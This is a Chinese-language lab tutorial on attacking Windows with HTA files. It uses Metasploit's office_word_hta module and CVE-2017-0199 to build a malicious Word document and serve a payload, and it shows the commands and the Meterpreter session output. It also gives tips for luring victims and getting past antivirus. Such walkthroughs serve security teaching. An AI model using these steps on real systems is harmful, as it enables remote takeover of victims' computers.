Kali 渗透测试:利用HTA文件进行渗透攻击

由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序(HTML Application,HTA)文件就成了最好的选择。

HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通HTML网页相比, HTA文件多了一个“HTA:APPLICATION”标签,这个标签提供了一系列面向软件的功能。最重要的是, 它能够让你访问客户的计算机,而不用担心安全的限制。运行HTA文件,会调用%SystemRoot%\system32\mshta.exe(HTML Applicationhost)执行。

下面是一个HTA文件的代码:

<!--example1.hta-->
<html><head><title>Hello my first HTA</title></head><body><center><p>HTA</p><p>HTML Application</p></center></body>
</html>

把上面的代码复制到文本编辑器中,然后保存为HTA文件,直接双击HTA文件就可以看到效果,如下图所示:

利用HTA文件进行攻击的方式也很简单,黑客只需要构造一个包含HTA恶意文件的恶意网址,然后诱使受害者单击这个网址,受害者的计算机就会运行里面的恶意文件,如下图所示:

如果受害者单击保存文件,如果计算机中安装了杀毒软件,该HTA也可能被查杀。但这并不意味着无计可施了,利用CVE-2017-0199漏洞将恶意的HTA文件载入Word文件,当受害者使用有漏洞的Office打开Word文件时,就会自动运行恶意的HTA文件,从而被成功渗透。

Metasploit提供了exploit/windows/fileformat/office_word_hta模块,这个模块包含两个功能:一个功能是启动一个Web服务器,里面包含恶意的HTA文件;另一个功能是生成一个包含这个恶意HTA文件的Word文件。无论受害者是访问了黑客提供的恶意网址,还是打开了这个恶意Word文件,都会被渗透。

使用Metasploit模拟这个过程如下:

实验环境

操作机:Linux kali 5.10.0 IP :192.168.68.125

靶机:Win7

操作步骤:

1. 在Kali主机中,启动metasploit

在命令行输入如下命令:

┌──(kali㉿kali)-[~]
└─$ msfconsole

2. 启动office_word_hta模块

进入metasploit界面,输入如下命令:

msf6 > use exploit/windows/fileformat/office_word_hta

使用show targets 命令查看这个模块的攻击目标如下图所示:

使用show options命令查看这个模块的参数,如下图所示:

这个模块的使用方法很简单,可以使用默认参数。

3. run命令启动这个模块

使用run命令启动这个模块,命令如下:

msf6 exploit(windows/fileformat/office_word_hta) > run

从图中看到,箭头所指,其中msf.doc就是生成的包含恶意HTA文件的Word文件:

[+] msf.doc stored at /home/kali/.msf4/local/msf.doc

而LocalIP就是包含恶意HTA文件的Web服务器的地址:

[+] Local IP: http://192.168.68.125:8080/default.hta

4. 模拟受害者单击恶意链接,访问http://192.168.68.125:8080/default/hta

在Win7主机的浏览器中访问这个Local IP, 如下图所示:

5. 回到Kali主机,连接成功

在上图中单击“运行®”按钮,回到Kali主机可以看到,恶意软件已经成功获得了Meterpreter的控制权限。如果没有显示,可以按Enter健测试。下面是成功建立连接会话后的显示结果。

msf6 exploit(windows/fileformat/office_word_hta) >
[*] Sending stage (175174 bytes) to 192.168.68.159
[*] Meterpreter session 1 opened (192.168.68.125:4444 -> 192.168.68.159:49222) at 2022-05-13 04:44:18 -0400

如下图所示:

在Kali会话,执行一些cmd命令对靶机进行操作,如下图所示:

不能直接运行default.hta文件的情况

​ 现在有很多种浏览器,它们对HTA文件的处理方式不同。如在某些浏览器中,可能看到的是如下图所示情况,没有“运行”按钮。

**备注:**如果default.hta文件保存之后,没有被查杀,直接双击运行,也一样可以正常连接到Kali主机,效果跟在浏览器直接访问一样,这里不再赘述。

如果计算机中安装了杀毒软件,该HTA也可能被查杀。前面提到过还有CVE-2017-0199漏洞的存在,这时可以首先使用cp命令将msf.doc文件复制到一个可以访问的目录(如/var/www/html中),在Kali操作机中输入如下命令:

┌──(root												

Kali 渗透测试:利用HTA文件进行渗透攻击相关推荐

  1. 基于Android设备的Kali Linux渗透测试教程第1章渗透测试

    基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...

  2. 渗透测试入门9之域渗透

    渗透测试入门9之域渗透 信息搜集 powerview.ps1 Get-NetDomain - gets the name of the current user's domain Get-NetFor ...

  3. 渗透测试八个步骤【渗透测试流程】

    渗透测试遵循软件测试的基本流程,但由于其测试过程与目标的特殊性,在具体实现步骤上渗透测试与常见软件测试并不相同.渗透测试流程主要包括8个步骤,如下图所示: 下面结合上图介绍每一个步骤所要完成的任务. ...

  4. 渗透测试入门8之端口渗透

    渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...

  5. Kali渗透测试——利用metasploit攻击靶机WinXP SP1

    搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...

  6. 《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书

    内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具.本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者"杀链"采取的具体 ...

  7. 渗透测试中的文件传输技巧

    目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP serve ...

  8. termux使用教程python手机_渗透测试|利用手机攻击电脑(Termux终端初体验)

    至少我们曾经在一起过. 来自:一言 介绍 Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby ...

  9. Kali Linux 无线渗透测试入门指南 第六章 攻击客户端

    第六章 攻击客户端 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 安全强度取决于最弱的部分. – 信息安全领域 ...

最新文章

  1. POJ2932Coneology(计算几何、平面扫描)
  2. java 对 mongoDB 分组统计操作 以及一些常用操作
  3. scanf(“%s“)真的只开读入字符串大小就可以了吗??
  4. hdoj-1004-Let the Balloon Rise(map排序)
  5. php zend 多个站错误,php – 如何显示Zend框架抛出的异常错误
  6. MiniGUI编程--组合框
  7. 802.11的CSMA/CA机制
  8. Linux软raid创建
  9. 视觉培训4 完成手写识别项目
  10. StringUtil工具类之去除所有的空白字符
  11. 鸡汤来了,成为数据分析师的快速指南
  12. 聊聊H5浏览器实现扫一扫
  13. 【matlab算法原理详解】车牌识别算法
  14. 人物画像及“七步人物角色法”
  15. elasticsearch问题: SERVICE_UNAVAILABLE/1/state not recovered /initialized
  16. Pytorch 框架
  17. python去除pdf水印_聊聊 Python 操作PDF的几种方法(合并、拆分、水印、加密)
  18. IP归属地查询(基于本地IP库实现)
  19. 超低功耗MCU的选择方法
  20. IPsec+预共享密钥的IKE野蛮模式

热门文章

  1. getshell方法总结
  2. C语言如何输出回车换行
  3. 智能排产系统实现步骤
  4. github小工具之bufferfly
  5. java 替换回车 char10_EXCEL的换行符等,输入,替换,和 char(10) char(13)等
  6. java-net-php-python-jspm婚恋网站计算机毕业设计程序
  7. 分享一个AI模型网站,琳琅满目
  8. mysql 易百教程
  9. MySQL Workbench安装教程
  10. 大专应届,充满期望的第九天(面试)